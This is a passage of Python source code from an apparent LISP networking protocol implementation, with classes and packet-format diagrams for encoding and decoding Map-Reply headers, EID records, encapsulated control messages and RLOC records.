lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
